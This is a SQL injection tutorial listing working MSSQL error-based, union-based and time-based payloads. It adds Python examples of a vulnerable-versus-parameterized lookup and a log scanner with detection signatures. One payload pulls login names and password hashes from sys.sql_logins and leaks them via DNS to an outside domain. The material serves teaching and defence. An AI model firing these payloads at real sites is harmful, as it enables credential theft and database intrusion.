SQL Injection Basics: Understanding SQL Injection Codes

3 Classes of SQL Injection

SQL injection can be broken up into 3 classes:

Inband: data is extracted using the same channel that is used to inject the SQL code.
This is the most straightforward kind of attack, in which the retrieved data is presented
directly in the application web page.

Out-of-Band: data is retrieved using a different channel (such as a DNS lookup the
database server is made to perform).

Inferential: there is no actual transfer of data, but the tester is able to reconstruct the
information by sending particular requests and observing the resulting behavior of the
website/DB server.


Error-Based and Union-Based SQL Injections

[site]/page.asp?id=1 or 1=convert(int,(USER))--

The cast of USER to int fails, and an application that echoes database errors to the page
returns the user name inside the error text. The next payload is an out-of-band variant of
the same idea: it builds a hostname from each login name and password hash and makes the
server resolve that hostname, so the data leaves through DNS instead of the web page.

[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

Blind SQL Injection

[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'-- 


SQL Injection Types

Error:
Asking the DB a question that will cause an error, and gleaning information from the error.
Union:
The SQL UNION is used to combine the results of two or more SELECT SQL
statements into a single result. Really useful for SQL Injection :)
Blind:
Asking the DB a true/false question and using whether a valid page is returned or not, or
the time it took for the valid page to return, as the answer to the question.
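The three types above come from one root cause: the request parameter is pasted into the SQL text. The following added example (written for this page, not the original author's code) reproduces the error, union and blind behaviours against a constructed in-memory SQLite database standing in for the article's MSSQL-backed page.asp, and then shows that binding the value as a parameter removes all three. Table names, rows and the HASH-PLACEHOLDER value are constructed; the SQLite error wording differs from the MSSQL messages quoted on this page, but the column-counting logic is identical.

```python
import sqlite3

# Constructed sample schema: a "pages" table behind page.asp?id=... and a
# "users" table the application never meant to expose.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, author TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)",
                     [(1, "Home", "welcome", "editor"), (2, "About", "about us", "editor")])
    conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'HASH-PLACEHOLDER')")  # constructed value
    return conn

def page_vulnerable(conn, page_id):
    """Vulnerable lookup: the request parameter is concatenated into the SQL text."""
    sql = "SELECT id, title, body, author FROM pages WHERE id=" + page_id
    try:
        return ("rows", conn.execute(sql).fetchall())
    except sqlite3.Error as e:
        # An application that echoes this message to the browser is doing exactly
        # what error-based injection relies on; log it server-side instead.
        return ("error", str(e))

def page_parameterized(conn, page_id):
    """Hardened lookup: the value is bound, so it is data and never SQL syntax."""
    sql = "SELECT id, title, body, author FROM pages WHERE id=?"
    return ("rows", conn.execute(sql, (page_id,)).fetchall())

def demo():
    conn = make_db()
    return {
        # Error-based: a UNION with the wrong column count raises, and the message
        # tells the attacker to keep counting (compare the MSSQL text on this page).
        "wrong_column_count": page_vulnerable(conn, "1 UNION SELECT ALL 1--"),
        # Union-based: once the count matches, rows from another table ride along.
        "union_four_columns": page_vulnerable(conn, "1 UNION SELECT ALL 1,2,3,4--"),
        "union_leaks_user":   page_vulnerable(conn, "null UNION SELECT ALL 1,name,3,4 FROM users--"),
        # Blind (boolean): the page either renders or is empty, answering one question.
        "blind_len_is_5":     page_vulnerable(conn, "1 AND (SELECT length(name) FROM users)=5"),
        "blind_len_is_4":     page_vulnerable(conn, "1 AND (SELECT length(name) FROM users)=4"),
        # Parameterized: the whole payload is compared against id as a value and matches nothing.
        "param_payload":      page_parameterized(conn, "1 UNION SELECT ALL 1,2,3,4--"),
        "param_normal":       page_parameterized(conn, "1"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:20s} {result}")
```

Parameter binding is the fix the rest of this page is implicitly arguing for; validating that `id` is an integer before the query and returning a generic error page rather than the database message close the error-based and blind channels further.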


Examples:

[site]/page.asp?id=1 having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

[site]/page.asp?id=x'having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

[site]/page.asp?id=1 or 1=convert(int,(USER))--

http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
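From the defender's side, every request shown in these examples passes through the web server log, and the time-based probes additionally leave a tell-tale response time. The following added example (not part of the original post) scans constructed W3C-style IIS log lines for the payload shapes on this page: UNION SELECT column counting, HAVING 1=1 and convert(int, ...) error probes, stacked queries, WAITFOR DELAY, and the xp_fileexist / sys.sql_logins out-of-band pattern. It URL-decodes twice so double-encoded payloads still surface, treats a WAITFOR request whose time-taken field is at least 10 seconds as corroborated, and leaves the benign "credit union" search alone. The log format (date time method uri status time-taken-ms) and all sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the payload shapes on this page (MSSQL-flavoured).
SIGNATURES = [
    ("union-based",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("error-based",   re.compile(r"\bconvert\s*\(\s*int\b|\bhaving\s+1\s*=\s*1\b", re.I)),
    ("time-based",    re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("stacked-query", re.compile(r";\s*(declare|exec|if)\b", re.I)),
    ("out-of-band",   re.compile(r"\bxp_fileexist\b|\bsys\.sql_logins\b", re.I)),
]

# Constructed log: date time method uri status time-taken(ms). Line 2 is a benign
# search, line 6 is the convert(int, USER) probe double URL-encoded.
SAMPLE_LOG = """\
2024-01-15 10:02:11 GET /page.asp?id=1 200 15
2024-01-15 10:02:40 GET /search.asp?q=credit+union+rates 200 22
2024-01-15 10:03:02 GET /page.asp?id=1+having+1%3D1-- 500 18
2024-01-15 10:03:09 GET /page.asp?id=1+UNION+SELECT+ALL+1,2,3,4-- 200 20
2024-01-15 10:03:31 GET /page.asp?id=1;+IF+(LEN(USER)%3D3)+WAITFOR+DELAY+'00:00:10'-- 200 10042
2024-01-15 10:04:05 GET /page.asp?id=1%2520or%25201%3Dconvert(int,(USER))-- 500 17
"""

def decode_query(raw):
    """Decode %xx and '+' twice so a double-encoded payload is still visible."""
    return unquote_plus(unquote_plus(raw))

def scan_line(line):
    """Return (uri, [labels]) for one log line, or None if the line does not parse."""
    parts = line.split()
    if len(parts) != 6:
        return None
    _date, _time, _method, uri, _status, time_taken = parts
    query = decode_query(uri.partition("?")[2])
    labels = [name for name, rx in SIGNATURES if rx.search(query)]
    # A WAITFOR probe that really did stall the server is strong corroboration.
    if "time-based" in labels and int(time_taken) >= 10000:
        labels.append("slow-response-corroborates-delay")
    return (uri, labels)

def scan_log(lines):
    """Return [(line_number, uri, labels)] for every line that matched at least one rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        parsed = scan_line(line)
        if parsed and parsed[1]:
            hits.append((number, parsed[0], parsed[1]))
    return hits

if __name__ == "__main__":
    for number, uri, labels in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {number}: {', '.join(labels)}  <- {uri}")
```

Regex signatures are a starting point for alerting, not a substitute for parameterized queries; the value of the time-taken check is that it separates a real blind probe from scanner noise that never reached the database.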


